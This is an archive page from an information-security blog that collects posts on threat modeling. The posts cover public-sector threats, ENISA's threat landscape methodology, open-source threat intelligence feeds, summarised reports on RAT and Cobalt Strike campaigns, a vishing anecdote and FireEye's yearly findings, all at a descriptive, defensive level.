Phishing involves the utilization of legitimate-looking emails to steal the login credentials or other sensitive information of a target organization. While it’s just as much a risk for small and medium-sized businesses, in the public sector, phishing attacks could potentially be nation-state sponsored, making it a possible double whammy.

While taking advantage of the latest and greatest software to protect yourself from top cybersecurity threats is par for the course, what makes phishing so pernicious is that it relies on human error. With phishing emails looking more authentic than ever, they are harder to catch.

Distributed Denial of Service (DDoS) Attacks

A recent report says ransom DDoS attacks increased 29% year over year and 175% quarter over quarter in quarter four of 2021. Some of the biggest targets were the public sector, schools, travel organizations, and credit unions.

DDoS attacks are known to bring down some of the largest websites and are quite difficult to prevent. They are considered by some to be the most “powerful weapon” on the internet, easily making DDoS attacks one of the top cyber security threats to the government.

DDoS attacks can happen at any time, affect any part of a website, and disrupt and interrupt services, usually leading to massive financial damage.

Nation-State Sponsored Cyber Attacks

With mainstream media daily broadcasting events as they are occurring to every channel imaginable (cable TV, smartphones, social media, etc.) cyber warfare has become an increasingly common way to launch disinformation campaigns, perform cyber espionage or terrorism, and even cyber-sabotage targets.

Nation-state-sponsored cyber attacks aim to

  • Hinder communication
  • Gather intelligence
  • Steal intellectual property
  • Damage to digital and physical infrastructure

They are even used for financial gain.

Though cyber attacks are sometimes used in tandem with real life attacks, what makes cyber warfare especially challenging is that it happens virtually and often covertly. There usually isn’t any declaration of war. That makes it difficult to prove who is responsible for the attack.

Ransomware

Ransomware attacks may not be an emerging trend by any means. They may not even be anything new. But they do have a history of wreaking havoc on the public sector and therefore need to be taken seriously.

Rewind to 2019 when the U.S. was hit by an unrelenting barrage of ransomware attacks that ultimately affected at least 966 government agencies, educational establishments, and healthcare providers to $7.5 billion (Emsisoft).

These attacks resulted in 911 services being interrupted, surveillance systems going offline, badge scanners and building access systems not working, websites going down, extended tax payment deadlines, and much more.

The threat of ransomware attacks still looms today and is no less a concern in 2022 than they were in 2019. As far as cyber security threats to the government are concerned, ransomware attacks should be kept on the cybersecurity radar.

What The Public Sector Can Do to Stay Ahead?

Beyond taking full advantage of the latest tech, for the public sector to stay ahead of cyber security in the public sector, you have to create a culture of cybersecurity within your organizations, offering ongoing training to their teams.

You need to secure all infrastructure, including cloud, mobile, and Internet of Things (IoT). You also want to improve compromise detection and be fully prepared for any attack. Plans should be documented and practiced regularly, so detection and response are immediate.

Top Cybersecurity Threats for Public Sector

Tags: Top Cybersecurity Threats


Jul 08 2022

ENISA released the Threat Landscape Methodology

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 11:17 am

I’m proud to announce that the European Union Agency for Cybersecurity, ENISA, has released the Threat Landscape Methodology.

Policy makers, risk managers and information security practitioners need up-to-date and accurate information on the current threat landscape, supported by threat intelligence. The EU Agency for Cybersecurity (ENISA) Threat Landscape report has been published on an annual basis since 2013. The report uses publicly available data and provides an independent view on observed threat agents, trends and attack vectors.

ENISA aims at building on its expertise and enhancing this activity so that its stakeholders receive relevant and timely information for policy-creation, decision-making and applying security measures, as well as in increasing knowledge and information for specialised cybersecurity communities or for establishing a solid understanding of the cybersecurity challenges related to new technologies.

The added value of ENISA cyberthreat intelligence efforts lies in offering updated information on the dynamically changing cyberthreat landscape. These efforts support risk mitigation, promote situational awareness and proactively respond to future challenges.
Following the revised form of the ENISA Threat Landscape Report 2021, ENISA continues to further improve this flagship initiative.
ENISA seeks to provide targeted as well as general reports, recommendations, analyses and
other actions on future cybersecurity scenarios and threat landscapes, supported through a clear
and publicly available methodology.

By establishing the ENISA Cybersecurity Threat Landscape (CTL) methodology, the Agency
aims to set a baseline for the transparent and systematic delivery of horizontal, thematic, and
sectorial cybersecurity threat landscapes. The following threat landscapes could be considered
as examples.

  • Horizontal threat landscapes, such as the overarching ENISA Threat Landscape (ETL), a product which aims to cover holistically a wide-range of sectors and industries.
  • Thematic threat landscapes, such as the ENISA Supply Chain Threat Landscape, a product which focuses on a specific theme, but covers many sectors.
  • Sectorial threat landscape, such as the ENISA 5G Threat Landscape, focuses on a specific sector. A sectorial threat landscape provides more focused information for a particular constituent or target group.

Recognising the significance of systematically and methodologically reporting on the threat landscape, ENISA has set up an ad hoc Working Group on Cybersecurity Threat Landscapes2 (CTL WG) consisting of experts from European and international public and private sector entities.

The scope of the CTL WG is to advise ENISA in designing, updating and reviewing the methodology for creating threat landscapes, including the annual ENISA Threat Landscape (ETL) Report. The WG enables ENISA to interact with a broad range of stakeholders for the purpose of collecting input on a number of relevant aspects. The overall focus of the methodological framework involves the identification and definition of the process, methods, stakeholders and tools as well as the various elements that, content-wise, constitute the cyberthreat Landscape (CTL).

You can download the ENISA Threat Landscape Methodology here:

ENISA Threat Landscape Methodology

ENISA Threat Landscape Methodology

Did you manage to assess the risks of remote work so that your company data remain safe?

To help you out, Advisera have created a free white paper: Checklist of cyber threats & safeguards when working from home, which outlines the key cyber threats and vulnerabilities you need to address.


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: ENISA, ENISA Threat Landscape, Threat Landscape Methodology


Jan 26 2022

Open-source Threat Intelligence Feeds

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 10:56 pm

Table of Contents

Threat intelligence feeds are a critical part of modern cybersecurity. Widely available online, these feeds record and track IP addresses and URLs that are associated with phishing scams, malware, bots, trojans, adware, spyware, ransomware and more. Open source threat intelligence feeds can be extremely valuable—if you use the right ones. While these collections are plentiful, there are some that are better than others. Being an actively updated database doesn’t guarantee that it is a highly reliable or detailed one either, as some of the best online haven’t necessarily been updated in a few months.

We will try to keep our own tally of some of the better open source threat intelligence feeds below, regularly updating it with new feeds and more details about each one. A share of the entries will be managed by private companies that have premium, or at least closed-source, offerings as well. This list is meant to cover free and open source security feed options.

1. Emerging Threats

Developed and offered by Proofpoint in both open source and a premium version, The Emerging Threats Intelligence feed (ET) is one of the highest rated threat intelligence feeds. ET classifies IP addresses and domain addresses associated with malicious activity online and tracks recent activity by either. The feed maintains 40 different categories for IPs and URLs, as well as a constantly updated confidence score.

2. FBI InfraGard

This being backed by the Federal Bureau of Investigation definitely gives it some clout. It’s actually a collaboration between the FBI and the private sector, with its information freely available to private companies and public sector institutions to keep appraised on threats relevant to 16 specific categories of infrastructure identified by the Cybersecurity and Infrastructure Security Agency (a department of the US Department for Homeland Security). Sectors include energy and nuclear power, communications, chemicals, agriculture, healthcare, IT, transportation, emergency services, water and dams, as well as manufacturing and financial.

3. Dan.me.uk

Dan is a collection of 10 tools that together report on IP and domain information. It includes info on IP subnets, the TOR status of IP addresses, DNS blacklists, IP address checking for autonomous systems, and node lists.

4. CINS Score

The CINS Score is supported by Sentinel. Like ET’s confidence score, the CINS Score rates IP addresses according to their trustworthiness. They add data about suspected or confirmed attacks from those IPs in the form of frequency, nature and breadth. They also try to create ‘personas’ around the sorts of attacks those IPs are tied to: scanning, network or remote desktop vulnerabilities, malware bots, or command-and-control servers.

5. Blocklist.de

Blocklist.de pays attention to server attacks from SSH, FTP, email and webserver sources. Their site claims to report an average of 70,000 attacks every 12 hours using a combo of the abusix.org database, Ripe-Abuse-Finder, and Whois information.

6. hpHosts

hpHosts is a searchable database and hosts file that is community managed. While it was last updated in August 2019, it is considered one of the more reliable data stores of malicious IPs online. It can also be sorted by PSH and FSA-only.

7. AlienVault OTX

AlienVault Open Threat Exchange (OTX) is the company’s free, community-based project to monitor and rank IPs by reputation. It generates alert feeds called “pulses,” which can be manually entered into the system, to index attacks by various malware sources. While some pulses are generated by the community, AlienVault creates its own as well that automatically subscribes all OTX’s users. Most pulses are automatically API-generated and submitted via the OTX Python SDK. This example, SSH bruteforce logs 2016-06-09, shows the indicators, geoip of the attacks, and a full list of the IPs used. It also links to reports in other pulses that include the same IPs.

8. Abuse.ch Feodo Tracker

This abuse.ch offering focuses on botnets and command-and-control infrastructure (C&C). The blocklist is an amalgamation of several minor blocklists with attention paid to Heodo and Dridex malware bots. There were 5,374 entries as of 03-03-2020.

Of course, the name itself is a direct response to an older trojan virus called Feodo, which was a successor to the Cridex e-banking trojan. (to which both Dridex and Heodo both trace their source code). Feodo Tracker also tracks an associative malware bot, TrickBot.

9. Abuse.ch URLhaus

The first of two projects from Swiss website abuse.ch, URLhaus is a depository of malicious domains tied to distributing malware. The database can be accessed via a URLhaus API, allowing you to download CSV collections of flagged URLs, those site’s respective statuses, the type of threat associated with them, and more. Ready-made downloads include periods of recent additions (going back 30 days), or all active URLs.

The full URLhaus dataset—as updated every 5 minutes—is automatically and immediately available for CSV download. It also includes a ruleset suited for use in Suricata or Snort. URLhaus also offers a DNS firewall dataset that includes all marked URLs for blocking. 

source: https://logz.io/blog/open-source-threat-intelligence-feeds/

Practical Threat Intelligence and Data-Driven Threat Hunting: A hands-on guide to threat hunting with the ATT&CK™ Framework and open source tools

Tags: Open-source Threat Intelligence Feeds


Jan 13 2022

Threat actors abuse public cloud services to spread multiple RATs

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 10:05 am

Threat actors are actively exploiting public cloud services from Amazon and Microsoft to spread RATs such as NanocoreNetwire, and AsyncRAT used to steal sensitive information from compromised systems.

The malware campaign was spotted by Cisco Talos in October 2021, most of the victims were located in the United States, Italy and Singapore.

Threat actors leverages cloud services like Azure and AWS because they can be easily set up with minimal efforts making it more difficult for defenders to detect and mitigate the campaigns.

The attackers used complex obfuscation techniques in the downloader script.

The attack chains starts with a phishing email using a malicious ZIP attachment that contain an ISO image with a loader in the form of JavaScript, a Windows batch file or Visual Basic script. Upon executing the initial script, the victim’s machine download the next stage from the C2 server, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance.

“To deliver the malware payload, the actor registered several malicious subdomains using DuckDNS, a free dynamic DNS service. The malware families associated with this campaign are variants of the Netwire, Nanocore and AsyncRAT remote access trojans.” reads the analysis published by Talos. “Organizations should be inspecting outgoing connections to cloud computing services for malicious traffic. The campaigns described in this post demonstrate increasing usage of popular cloud platforms for hosting malicious infrastructure.”

Once installed the malware on the target system, it can be used to steal confidential data or to deliver additional payloads such as ransomware attacks. Threat actors can also sell the access to other cybercrime gangs, including ransomware affiliates.

“Organizations should deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages and break the infection chain as early as possible.” concludes the report that also includes Indicators of Compromise (IoCs).

Tags: Cyber-Security Threats, public cloud services, RATs


Dec 28 2021

Threat actors are abusing MSBuild to implant Cobalt Strike Beacons

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 9:30 am

Security expert from Morphus Labs recently observed several malicious campaigns abusing Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised machines.

MSBuild is a free and open-source build toolset for managed code as well as native C++ code and was part of .NET Framework. It is used for building apps and gives users an XML schema that controls how the build platform processes and builds software to deliver malware using callbacks.

Morphus Labs security researcher and SANS Internet Storm Center (ISC) handler Renato Marinho revealed to have uncovered two different malicious campaigns that were abusing MSBuild for code execution.

The malicious MSBuild project employed in the attacks was designed to compile and execute specific C# code that in turn decodes and executes Cobalt Strike payload.

“Now, let’s look at the malicious MSBuild project file in Figure 3. Using the same principle, when called by MSBuild, it will compile and execute the custom C#, decode and execute the Cobalt Strike beacon on the victim’s machine.” wrote Marinho.

malicious msbuild project

In the attack scenario described by the researcher, the attackers initially gained access to the target environment using a valid remote desktop protocol (RDP) account, then leveraged remote Windows Services (SCM) for lateral movement, and MSBuild to execute the Cobalt Strike Beacon payload.

The Beacon was used to decrypt the communication with the C2 server, which was SSL encrypted.

Cobalt Strike, a Defender’s Guide

Cobalt Strike, a Defender’s Guide (The DFIR Report's 2021 Intrusions) by [The DFIR Report]

Tags: Cobalt Strike, Cobalt Strike Beacons, MSBuild


Dec 17 2021

SANS 2021 Top New Attacks and Threat Report

SANS 2021 Top New Attacks and Threat Report Download

System Security Threats | Computer Science Posters

Tags: SANS 2021, System Security Threats


Dec 06 2021

2022 and the threat landscape: The top 5 future cybersecurity challenges

2022 is going to be a year of building greater resiliency and integrating this into all aspects of business operations. This will require organizations of all levels to review how they are responding to a larger scale of sophisticated threats. To build on the efforts of 2021, CISOs need to address how they can implement innovation into their business without making themselves more vulnerable to damaging attacks.

There are five big trends that I see defining the market in 2022 that security professionals should pay attention to:

. The rise of the “assume-breach” mindset

Zero trust applies the principle of fundamentally not trusting anything on or off your network and deploys a “assume-breach” mindset. 

. Innovation and new risk in 5G

. Customization, personalization and getting personal with phishing tactics

. Hackers will go for gold at the Beijing Olympics

. The enterprise API ecosystem will show its vulnerabilities

The Ransomware Threat Landscape: Prepare for, recognize and survive ransomware attacks

Tags: threat landscape


May 20 2021

“Vishing”: An Ever Evolving Persistent Threat to the Public

Category: Mobile Security,Threat ModelingDISC @ 3:43 pm

Last month, my wife was contacted by a phisher, mascaraing as someone from social security. This threat actor made an attempt to obtain her social security number using the threat of fraud investigation to verify her social security number. Because of my background in security, I was able to act quickly to prevent her from compliance and educated her on the phish attack. For many people, this ends in far less positive outcomes because there is not enough education and prevention out there. The majority of organizations will never request or disclose personal identifiable information (PII) and will only communicate via secure encrypted email or over traditional mail services. They will request an in person visit. For more information on securing your private information, visit: How to protect your personal information Caller ID is less reliable due to caller ID spoofing. This in part can be avoided by maintaining an address book in conjunction with a good call blocking service.

The majority of telecom providers offer programmable call blocking services, most of these operate with a programmable blacklist/whitelist. There are also third-party options on the device App Store. This function acts in many ways similar to malware detection and prevention. These features are also available as an add-on for a landline that blocks on a hardware level at the home or business demarcation point. This is slowly phasing out as more and more people are migrating to VoIP solutions or cellular based services. For more information on Caller ID spoofing, visit: howtogeek Dont trust caller id More information on call blocking at FCC Call blocking More information on call blocking for landlines at FCC Do not call list Opinion The best approach to handling telemarketers is a zero-trust approach, sellers you wish to do business with should be in your address book for ease of verification. Automated calling can potentially be used to gather recorded voice prompts as a potential persistent attack to gather voice commands to use on voice prompt services. These calls may also be used to verify the contact number is active and accepting calls. If you can avoid not answering a call or push it to voicemail, do it. Make sure you monitor your voicemail in the event a trusted contact is contacting you from a different contact source. Stay safe out there! ~Neumiller

Vishing attacks spoof Amazon to try to steal your credit card information

Phone call from unknown number late at night. Scam, fraud or phishing with smartphone concept. Prank caller, scammer or stranger. Man answering to incoming call.

Tags: vishing


Apr 14 2021

The FBI Is Now Securing Networks Without Their Owners’ Permission

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 10:30 am

In January, we learned about a Chinese espionage campaign that exploited four zero-days in Microsoft Exchange. One of the characteristics of the campaign, in the later days when the Chinese probably realized that the vulnerabilities would soon be fixed, was to install a web shell in compromised networks that would give them subsequent remote access. Even if the vulnerabilities were patched, the shell would remain until the network operators removed it.

Now, months later, many of those shells are still in place. And they’re being used by criminal hackers as well.

On Tuesday, the FBI announced that it successfully received a court order to remove “hundreds” of these web shells from networks in the US.

Tags: Securing Networks


Apr 14 2021

FireEye: 650 new threat groups were tracked in 2020

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 10:09 am

FireEye published its M-Trend 2021 report based on the data collected during the investigation, 650 new threat groups were tracked in 2020

FireEye published its annual report, titled M-Trend 2021, which is based on the data collected during the investigation on security incidents it managed. Most of the incidents investigated by Mandiant (59%) in 2020 were initially detected by the victims, a data that is an improvement of 12% from 2019.

Since its launch, Mandiant tracked more than 2,400 threat groups, 650 of them were tracked in 2020. Over the years, the experts combined or eliminated approximately 500 groups, leaving more than 1,900 distinct groups tracked at this time (+100 compared to 2019).

The threat actors tracked by Mandiant include nation-state actors, financially motivated groups, and uncategorized groups (known as UNCs).

“In 2020, Mandiant experts investigated intrusions that involved 246 distinct threat groups. Organizations faced intrusions by four named financial threat (FIN) groups; six named advanced persistent threat (APT) groups, including groups from the nation-states of China, Iran and Vietnam; and 236 uncategorized threat (UNC) groups. Of the 246 threat groups observed at intrusion clients, 161 of these threat groups were newly tracked threat groups in 2020.” reads the report published by FireEye.

The Cyber Threat

Tags: new threat groups were tracked


Jul 27 2020

Facebook’s ‘Red Team’ Hacks Its Own AI Programs

Category: Hacking,Threat detection,Threat ModelingDISC @ 1:20 pm

Attackers increasingly try to confuse and bypass machine-learning systems. So the companies that deploy them are getting creative.

Source: Facebook’s ‘Red Team’ Hacks Its Own AI Programs




Tags: AI Programs, Facebook security, Fcaebook InfoSec, Red team


Mar 25 2020

Threat Simulation Overview and Setup – Active Countermeasures

Category: Cyber Threats,Threat detection,Threat ModelingDISC @ 11:50 am

Intro: No software project is complete without testing. In this blog series, we’ll cover how to test if your Threat Hunting platform can detect common threats.[…]

Source: Threat Simulation Overview and Setup – Active Countermeasures

Why You Need Threat Hunting!
httpv://www.youtube.com/watch?v=sKQHJhd-YWE

Cyber Threat Hunting: Identify and Hunt Down Intruders
httpv://www.youtube.com/watch?v=60pyxA0U9EQ

Real-Time Threat Hunting – SANS Threat Hunting & Incident Response Summit 2017
httpv://www.youtube.com/watch?v=TTbZd0he94U

Detecting Malware Beacons with Zeek and RITA
httpv://www.youtube.com/watch?v=eETUi-AZYgc





Subscribe to DISC InfoSec blog by Email





Dec 30 2019

Threat Modeling for Data Protection

Category: Threat ModelingDISC @ 10:52 pm

 

Threat Modeling for Data Protection

When evaluating the security of an application and data model ask the questions:

  • What is the sensitivity of the data?
  • What are the regulatory, compliance, or privacy requirements for the data?
  • What is the attack vector that a data owner is hoping to mitigate?
  • What is the overall security posture of the environment, is it a hostile environment or a relatively trusted one?

Data When threat modeling, consider the following common scenarios:

Source: Threat Modeling for Data Protection



Threat Modeling in 2019
httpv://www.youtube.com/watch?v=ZoxHIpzaZ6U






Subscribe to DISC InfoSec blog by Email